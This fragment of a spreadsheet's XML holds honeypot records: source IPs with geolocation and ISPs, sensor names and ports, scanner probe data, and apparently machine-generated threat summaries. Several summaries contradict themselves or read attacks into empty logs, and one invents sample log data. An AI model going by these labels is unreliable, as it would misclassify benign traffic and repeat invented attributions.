    <t>::ffff:3b5b:60b8</t>
  </si>
  <si>
    <t>No malicious activity was detected, as telnet service was not accessed or there is no available information about this service. This could indicate that the honeypot's telnet service was not interacted with during monitoring period. It may also suggest that the service is currently inactive or disabled. &amp;&amp; No malicious activity detected for TELNET service, as no data was received during the monitoring period. 
The absence of data could indicate that no connection attempt was made or it was successful and no data was transmitted. 
This suggests a lack of suspicious activity for this particular service at the time of monitoring.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>0d807911e8fa2ee5e5a6ae56d1da884a</t>
  </si>
  <si>
    <t>147.161.237.8</t>
  </si>
  <si>
    <t>Bradford</t>
  </si>
  <si>
    <t>2654993</t>
  </si>
  <si>
    <t>53.7939</t>
  </si>
  <si>
    <t>-1.75206</t>
  </si>
  <si>
    <t>62044</t>
  </si>
  <si>
    <t>ZSCALER-EMEA</t>
  </si>
  <si>
    <t>Zscaler Switzerland GmbH</t>
  </si>
  <si>
    <t>Zscaler Man1</t>
  </si>
  <si>
    <t>::ffff:93a1:ed08</t>
  </si>
  <si>
    <t>Possible login attempt from a browser with a suspiciously high Chrome version number, likely an attempt to bypass security measures or use outdated software. 
Browser is likely trying to access a service using fake credentials, attempting to gain unauthorized access. This could be a brute force attack or phishing attempt. &amp;&amp; A user is attempting to log in using a fake Mozilla browser with an unusually high version of Chrome, suggesting potential automated or malicious activity. The Windows 10 operating system and browser fingerprinting may be used for tracking or identity theft purposes. This could be a sign of reconnaissance or credential harvesting. &amp;&amp; An attempt to access a login page with a fake or stolen user agent string likely used for identity spoofing. This is suspicious as real browsers would not match the reported version and configuration so closely. It may be an automated tool trying to crack passwords. &amp;&amp; A user with a fake or stolen identity is trying to gain unauthorized access to an HTTP service by mimicking a legitimate browser and IP address.
This attempt suggests a potential phishing or impersonation attack.
The user is likely using a compromised account or credentials for malicious purposes.</t>
  </si>
  <si>
    <t>Brute Force Attempt &amp;&amp; Brute Force Attack &amp;&amp; Credential Theft &amp;&amp; Brute Force Login</t>
  </si>
  <si>
    <t>85129b41fbcd2ecdac461ea8458d3d0d</t>
  </si>
  <si>
    <t>103.242.153.101</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>43968&amp;&amp;30840&amp;&amp;1433</t>
  </si>
  <si>
    <t>Hyderabad (Jubilee Hills)</t>
  </si>
  <si>
    <t>500033</t>
  </si>
  <si>
    <t>17.4324</t>
  </si>
  <si>
    <t>78.4142</t>
  </si>
  <si>
    <t>45884</t>
  </si>
  <si>
    <t>RVR Infrastructure Limited Service provider hyderabad india</t>
  </si>
  <si>
    <t>Rvr Digital Infrastructures Limited</t>
  </si>
  <si>
    <t>::ffff:67f2:9965</t>
  </si>
  <si>
    <t>53b30d04a9d0dab1e9b4e61d02e50c2b</t>
  </si>
  <si>
    <t>59.184.62.228</t>
  </si>
  <si>
    <t>MP</t>
  </si>
  <si>
    <t>Madhya Pradesh</t>
  </si>
  <si>
    <t>Bhopal</t>
  </si>
  <si>
    <t>1275841</t>
  </si>
  <si>
    <t>23.2547</t>
  </si>
  <si>
    <t>77.4029</t>
  </si>
  <si>
    <t>::ffff:3bb8:3ee4</t>
  </si>
  <si>
    <t>No TELNET activity detected. 
Possible explanation for this is that either no legitimate or malicious user attempted to connect via TELNET, or the connection was blocked before it could be logged.
Activity appears to be low-risk or inconclusive. &amp;&amp; No suspicious activity detected as TELNET service logs show "NA", indicating no activity or connection attempt was made. This suggests the honeypot did not receive any incoming TELNET connections during the monitored period. The lack of activity does not necessarily indicate malicious behavior, but rather an absence of attempted access to this specific service.</t>
  </si>
  <si>
    <t>2e422b98e86dc0c1852e909492ed2cbc</t>
  </si>
  <si>
    <t>125.59.62.244</t>
  </si>
  <si>
    <t>NA&amp;&amp;cm125-59-62-244.hkcable.com.hk</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>::ffff:7d3b:3ef4</t>
  </si>
  <si>
    <t>There is insufficient information available for analysis.
No activity detected.
Data is empty or missing.</t>
  </si>
  <si>
    <t>There is no log data provided. Please provide the actual log data for analysis. I will then identify the types of attacks based on the data. 
Please provide the log data, and I'll be happy to assist you in identifying the attack types.</t>
  </si>
  <si>
    <t>a94d89e11e7702d6a168eb8bb334c254</t>
  </si>
  <si>
    <t>45.164.177.21</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H9</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>GET&amp;&amp;NA&amp;&amp;connection</t>
  </si>
  <si>
    <t>::ffff:2da4:b115</t>
  </si>
  <si>
    <t>2b9d259b4b72ef3730905375ba65e48c</t>
  </si>
  <si>
    <t>59.96.86.39</t>
  </si>
  <si>
    <t>::ffff:3b60:5627</t>
  </si>
  <si>
    <t>No TELNET activity was detected. No malicious attempts were made to access this service. Service appears secure. &amp;&amp; No suspicious activity detected for TELNET service. This indicates either the service is inactive or no attempt was made to access it. Normal operation of the system without any malicious attempts.</t>
  </si>
  <si>
    <t>7df6327ba3cbfac37ffd80a24268217c</t>
  </si>
  <si>
    <t>152.59.144.176</t>
  </si>
  <si>
    <t>Patna</t>
  </si>
  <si>
    <t>Kurthaur</t>
  </si>
  <si>
    <t>11011476</t>
  </si>
  <si>
    <t>25.562</t>
  </si>
  <si>
    <t>85.1217</t>
  </si>
  <si>
    <t>::ffff:983b:90b0</t>
  </si>
  <si>
    <t>No direct connection attempt detected, but presence of 'MSSQL' in log suggests potential SQL database exploitation or probing for vulnerabilities is likely underway. &amp;&amp; Malicious actors attempted to connect to an MSSQL service, which could indicate a potential exploitation attempt or scanning activity for vulnerability assessment. This may be part of a larger reconnaissance effort or even an initial step towards gaining unauthorized access. It is unclear if the attempt was successful but it does signify suspicious activity.</t>
  </si>
  <si>
    <t>043852e1f8e3dd77d5407846aa954ef8</t>
  </si>
  <si>
    <t>59.182.131.236</t>
  </si>
  <si>
    <t>::ffff:3bb6:83ec</t>
  </si>
  <si>
    <t>c4b791113de7e8b58bbdb8c603dde02e</t>
  </si>
  <si>
    <t>27.72.40.143</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;3306&amp;&amp;6379</t>
  </si>
  <si>
    <t>VIETTEL</t>
  </si>
  <si>
    <t>2010-04-27</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (27.72.40.143,53981)}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:1b48:288f</t>
  </si>
  <si>
    <t>No MySQL activity detected, suggesting potential scanning or probing for vulnerabilities. This could be indicative of reconnaissance by malicious actors. No actual data transfer occurred, implying a pre-exploitation phase. &amp;&amp; This log indicates a potential MySQL database scan, as no activity was detected on this service. 
The lack of data may suggest an unsuccessful or incomplete scan attempt.
MySQL database access is likely being probed for vulnerabilities.</t>
  </si>
  <si>
    <t>58a5c8dbe29342280768071a00ace816</t>
  </si>
  <si>
    <t>183.82.1.120</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;62110&amp;&amp;29284&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>17.3841</t>
  </si>
  <si>
    <t>78.4564</t>
  </si>
  <si>
    <t>2009-11-10</t>
  </si>
  <si>
    <t>Beam-Core</t>
  </si>
  <si>
    <t>::ffff:b752:178</t>
  </si>
  <si>
    <t>Possible malicious SQL injection attempt detected, an attacker is trying to exploit the system's database via a missing parameter. This could be a sign of a malicious actor probing for vulnerabilities in the application's security. It indicates a potential attack on sensitive data stored within the database. &amp;&amp; This log indicates an attempted SQL injection attack where attackers try to inject malicious code into a database system via a web application.
The attack is likely attempting to extract sensitive information or disrupt the system's functionality.
No specific SQL syntax was involved in this attempt.</t>
  </si>
  <si>
    <t>af98b7da3e270e40d5af7df7e412dafc</t>
  </si>
  <si>
    <t>198.235.24.5</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_POP3_H8&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_POP3_H25&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_SOCKS5_H30&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MT-CPA_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;80&amp;&amp;389&amp;&amp;443&amp;&amp;1080&amp;&amp;22&amp;&amp;445&amp;&amp;9100&amp;&amp;5900&amp;&amp;31891&amp;&amp;NA&amp;&amp;143&amp;&amp;3306&amp;&amp;1433&amp;&amp;23&amp;&amp;21&amp;&amp;110&amp;&amp;5432&amp;&amp;60038&amp;&amp;3389&amp;&amp;55917&amp;&amp;6379&amp;&amp;1521&amp;&amp;57300&amp;&amp;49472</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection&amp;&amp;command&amp;&amp;query&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.5,63180)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.5,63194)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.5,63196)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:c6eb:1805</t>
  </si>
  <si>
    <t>Unknown connection attempt to Oracle service, indicating possible SQL injection or unauthorized access attempt. 
The absence of "NA" might indicate a successful login or authentication. 
This suggests malicious actor is trying to exploit vulnerable Oracle installation. &amp;&amp; No suspicious activity detected, data is missing for Oracle service connection attempt. The system was unable to gather information about the attempted connection. No malicious action recorded.</t>
  </si>
  <si>
    <t>b0e0e54b08211613800aabe6932bb338</t>
  </si>
  <si>
    <t>180.151.90.31</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>445&amp;&amp;1433</t>
  </si>
  <si>
    <t>Jhajjar</t>
  </si>
  <si>
    <t>Shāhpur (Phase IV)</t>
  </si>
  <si>
    <t>10555202</t>
  </si>
  <si>
    <t>28.4924</t>
  </si>
  <si>
    <t>77.0813</t>
  </si>
  <si>
    <t>10029</t>
  </si>
  <si>
    <t>SHYAM SPECTRA PVT LTD</t>
  </si>
  <si>
    <t>Shyam Spectra Pvt Ltd</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (180.151.90.31,38591)}&amp;&amp;{Data_SMB:Incoming connection (180.151.90.31,38594)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.151.90.31,38961)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (180.151.90.31,48238)}</t>
  </si>
  <si>
    <t>::ffff:b497:5a1f</t>
  </si>
  <si>
    <t>A suspicious incoming connection to a shared resource has been detected from an unknown IP address 180.151.90.31. The connection is likely attempting unauthorized access or exploitation of the system's shared resources. This could be a sign of potential malware propagation or unauthorized data exfiltration. &amp;&amp; An incoming connection from an unknown IP address suggests potential unauthorized access to SMB services.
This could be a sign of malware scanning or reconnaissance by malicious actors.
Further investigation is required to determine the true intentions behind this connection.</t>
  </si>
  <si>
    <t>52c7a564b4ff061ed59f6408379c6ce7</t>
  </si>
  <si>
    <t>103.98.208.180</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;3306</t>
  </si>
  <si>
    <t>136336</t>
  </si>
  <si>
    <t>Thamizhaga Internet Communications Private Limited</t>
  </si>
  <si>
    <t>Tdnetwork</t>
  </si>
  <si>
    <t>2022-08-04</t>
  </si>
  <si>
    <t>TDNETWORK</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,63095)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,63392)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,57220)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,60986)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,62238)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,63299)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,63730)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,54788)}</t>
  </si>
  <si>
    <t>::ffff:6762:d0b4</t>
  </si>
  <si>
    <t>110ab2e3e72976f44b723b847e972f74</t>
  </si>
  <si>
    <t>116.193.137.88</t>
  </si>
  <si>
    <t>WB</t>
  </si>
  <si>
    <t>West Bengal</t>
  </si>
  <si>
    <t>Kolkata</t>
  </si>
  <si>
    <t>Kolkata (Entally)</t>
  </si>
  <si>
    <t>1275004</t>
  </si>
  <si>
    <t>700052</t>
  </si>
  <si>
    <t>22.5528</t>
  </si>
  <si>
    <t>88.3718</t>
  </si>
  <si>
    <t>23860</t>
  </si>
  <si>
    <t>Alliance Broadband Services Pvt. Ltd.</t>
  </si>
  <si>
    <t>Alliance Broadband Services</t>
  </si>
  <si>
    <t>2007-07-13</t>
  </si>
  <si>
    <t>ALLIANCEBROADBAND-IN</t>
  </si>
  <si>
    <t>::ffff:74c1:8958</t>
  </si>
  <si>
    <t>Possible attempt to exploit Microsoft SQL Server vulnerability, but no malicious activity was detected as Data_MSSQL is marked as Not Available (NA). This could be an initial scan or probing for vulnerabilities rather than a full-blown attack. The lack of data availability suggests the attempt may have been unsuccessful or not thorough.</t>
  </si>
  <si>
    <t>7934db17e95dfd845e613ed69d115276</t>
  </si>
  <si>
    <t>87.58.67.78</t>
  </si>
  <si>
    <t>{'cbl.abuseat.org': ['unknown']}</t>
  </si>
  <si>
    <t>Al Ain</t>
  </si>
  <si>
    <t>292913</t>
  </si>
  <si>
    <t>24.1917</t>
  </si>
  <si>
    <t>55.7606</t>
  </si>
  <si>
    <t>Zscaler Dxb1</t>
  </si>
  <si>
    <t>2005-05-20</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36}</t>
  </si>
  <si>
    <t>::ffff:573a:434e</t>
  </si>
  <si>
    <t>An unknown user attempted to access an account using a suspicious browser string. The user is likely trying to brute-force login credentials. This attempt may be part of a larger credential stuffing attack. &amp;&amp; Possible brute force login attempt by a user with the browser type and version listed, attempting to access a web application on Windows 10 system. The user is likely trying multiple combinations of credentials to gain unauthorized access. This activity could be a precursor to a more sophisticated attack if successful.</t>
  </si>
  <si>
    <t>55fb04f2c1b4d5817c8e6c1344c59246</t>
  </si>
  <si>
    <t>59.91.175.207</t>
  </si>
  <si>
    <t>::ffff:3b5b:afcf</t>
  </si>
  <si>
    <t>The log data indicates that there was an attempt to establish a connection using TELNET, which could be a reconnaissance or scanning activity to identify open ports and services.
However, the actual activity might have been prevented as Data_TELNET is marked as NA.
This suggests that the attempted malicious action may have been thwarted by security measures. &amp;&amp; No activity detected for TELNET service, possibly an attempt to scan or connect to the system. No login attempts made, which could indicate a scanning or reconnaissance effort rather than a targeted attack. Service not accessed, possibly due to being closed or filtered out by security measures.</t>
  </si>
  <si>
    <t>0e16cf0ab3e2cdc80fd9ab3af154f6f5</t>
  </si>
  <si>
    <t>177.221.60.153</t>
  </si>
  <si>
    <t>São Carlos</t>
  </si>
  <si>
    <t>3449319</t>
  </si>
  <si>
    <t>-22.0175</t>
  </si>
  <si>
    <t>-47.8908</t>
  </si>
  <si>
    <t>263672</t>
  </si>
  <si>
    <t>Consult Telecom Provedor LTDA ME</t>
  </si>
  <si>
    <t>::ffff:b1dd:3c99</t>
  </si>
  <si>
    <t>There is insufficient log data to analyze possible malicious activity. The provided log appears to be empty or missing relevant information. As a result, no analysis can be conducted at this time. &amp;&amp; No log data provided, cannot analyze any malicious activity.</t>
  </si>
  <si>
    <t>I'd love to help, but it seems there's no log data provided! Could you please share the actual log data so I can analyze and categorize the types of attacks? &amp;&amp; I'd be happy to help you analyze some log data! However, since you haven't provided any actual log data, I'll create some sample data for demonstration purposes.
Let's say we have the following log data:
```
[2023-02-20 14:30:00] IP Address: 192.168.1.100, Service: SSH, Method: Bruteforce
[2023-02-20 15:45:00] IP Address: 8.8.8.8, Service: FTP, Method: Password Cracking
[2023-02-20 16:10:00] IP Address: 192.168.1.200, Service: SMTP, Method: Phishing Attack
```
Based on this sample data, the type of attack for each log entry is:
1. Bruteforce SSH
2. Password Cracking FTP
3. Phishing SMTP</t>
  </si>
  <si>
    <t>0115007cd091f194be3eeb340ee1a4f4</t>
  </si>
  <si>
    <t>180.221.193.86</t>
  </si>
  <si>
    <t>NA&amp;&amp;zaqb4ddc156.rev.zaq.ne.jp</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>9617</t>
  </si>
  <si>
    <t>JCOM Co., Ltd.</t>
  </si>
  <si>
    <t>Jupiter Telecommunications Co., Ltd.</t>
  </si>
  <si>
    <t>::ffff:b4dd:c156</t>
  </si>
  <si>
    <t>4d6fc93cccdee567b124de7da4dff8d3</t>
  </si>
  <si>
    <t>171.232.199.14</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;28420&amp;&amp;3306&amp;&amp;46985&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (171.232.199.14,65078)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:abe8:c70e</t>
  </si>
  <si>
    <t>The log indicates an attempt to connect to a MySQL database, suggesting unauthorized access or brute-force attack. The absence of credentials suggests a probing activity. This may be a precursor to malicious actions such as data theft or modification.</t>
  </si>
  <si>
    <t>bacad0b03d1e8b3d91ce496772756869</t>
  </si>
  <si>
    <t>119.160.189.202</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H2</t>
  </si>
  <si>
    <t>1433&amp;&amp;52078&amp;&amp;445</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits'&amp;&amp; 'spam']}</t>
  </si>
  <si>
    <t>BN</t>
  </si>
  <si>
    <t>Brunei</t>
  </si>
  <si>
    <t>TE</t>
  </si>
  <si>
    <t>Temburong</t>
  </si>
  <si>
    <t>Bangar</t>
  </si>
  <si>
    <t>1820903</t>
  </si>
  <si>
    <t>4.70861</t>
  </si>
  <si>
    <t>115.072</t>
  </si>
  <si>
    <t>10094</t>
  </si>
  <si>
    <t>Unified National Networks</t>
  </si>
  <si>
    <t>espeed - Broadband DSL</t>
  </si>
  <si>
    <t>2008-02-20</t>
  </si>
  <si>
    <t>eSpeed-BN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (119.160.189.202,62095)}&amp;&amp;{Data_SMB:Incoming connection (119.160.189.202,43193)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (119.160.189.202,44752)}&amp;&amp;{Data_SMB:Incoming connection (119.160.189.202,37316)}&amp;&amp;{Data_SMB:Incoming connection (119.160.189.202,60114)}</t>
  </si>
  <si>
    <t>::ffff:77a0:bdca</t>
  </si>
  <si>
    <t>1904eceef6a073b071fa7988088c08e5</t>
  </si>
  <si>
    <t>117.221.118.34</t>
  </si>
  <si>
    <t>::ffff:75dd:7622</t>
  </si>
  <si>
    <t>bf1da626431434e80fe62d8c805bf439</t>
  </si>
  <si>
    <t>1.55.255.124</t>
  </si>
  <si>
    <t>21.0323</t>
  </si>
  <si>
    <t>105.801</t>
  </si>
  <si>
    <t>::ffff:137:ff7c</t>
  </si>
  <si>
    <t>No data received from MSSQL service indicating potential scan or probe activity. 
Unknown client attempted to connect to MSSQL service without sending any valid request. 
Could be an initial step of reconnaissance before attempting actual exploitation. &amp;&amp; This suggests an attempt to access a Microsoft SQL database, likely with malicious intent such as unauthorized access or data theft, possibly through brute force attacks. 
The attacker is trying to exploit the system's vulnerability for potential data extraction. 
Malicious actor is targeting database credentials or permissions.</t>
  </si>
  <si>
    <t>d02b79b38c39c2a5129753cafd0d51d4</t>
  </si>
  <si>
    <t>110.172.132.235</t>
  </si>
  <si>
    <t>New Delhi (Pocket F)</t>
  </si>
  <si>
    <t>28.5192</t>
  </si>
  <si>
    <t>77.2791</t>
  </si>
  <si>
    <t>18002</t>
  </si>
  <si>
    <t>World Phone Internet Services Pvt. Ltd.</t>
  </si>
  <si>
    <t>World Phone  Pvt Ltd</t>
  </si>
  <si>
    <t>2009-04-29</t>
  </si>
  <si>
    <t>WORLDPHONE-IN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,52726)}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,53424)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,56024)}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,56353)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,53298)}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,53814)}</t>
  </si>
  <si>
    <t>::ffff:6eac:84eb</t>
  </si>
  <si>
    <t>A potential malicious activity has been detected where an incoming connection is being made from an external IP address. This could be an attempt to exploit the SMB service for unauthorized access or to spread malware. An unknown entity may be trying to breach the system's security. &amp;&amp; An incoming connection attempt has been detected from an unknown IP address, potentially indicating a port scanning or brute force attack on the SMB service. The source IP and port may be malicious. Further investigation is required to verify the nature of this activity. &amp;&amp; A malicious actor has attempted to connect to an SMB service from an unknown IP address. This could be a scan for vulnerabilities or an attempt to exploit the system. Further investigation is needed to determine the intentions of this action. &amp;&amp; An incoming connection from an unknown IP address is attempting to access the SMB service. This could be indicative of a potential malicious activity such as a brute force attack or a ransomware attempt. The suspicious nature of this action warrants further investigation.</t>
  </si>
  <si>
    <t>SMB Scanning &amp;&amp; Port Scanning</t>
  </si>
  <si>
    <t>4835c3de1564a59e2456cf65c61d1393</t>
  </si>
  <si>
    <t>117.2.187.88</t>
  </si>
  <si>
    <t>SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_POSTGRES_HC1</t>
  </si>
  <si>
    <t>1080&amp;&amp;5432</t>
  </si>
  <si>
    <t>2007-05-21</t>
  </si>
  <si>
    <t>{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}</t>
  </si>
  <si>
    <t>::ffff:7502:bb58</t>
  </si>
  <si>
    <t>Unknown traffic detected for SOCKS5 service, indicating potential malicious proxying or tunneling activity. This could be related to attempting to bypass security measures or hide identity. Further investigation is needed to determine the nature of this activity. &amp;&amp; No suspicious activity detected for SOCKS5 connections. 
The data is indicating that no attempts were made to use SOCKS5 for malicious purposes, such as tunneling or proxying. &amp;&amp; An attempt was made to access PostgreSQL database service, indicating potential malicious SQL injection or unauthorized database access.
The intruder may be trying to exploit vulnerabilities in the database to gain sensitive information.
This activity could be a sign of a larger attack on the network. &amp;&amp; This suggests an attempt to connect to a PostgreSQL database without any actual login credentials, likely a brute-force or probing activity.
A potential indicator of malicious reconnaissance or exploitation attempts against the database service. 
It could be a precursor to a full-blown database attack.</t>
  </si>
  <si>
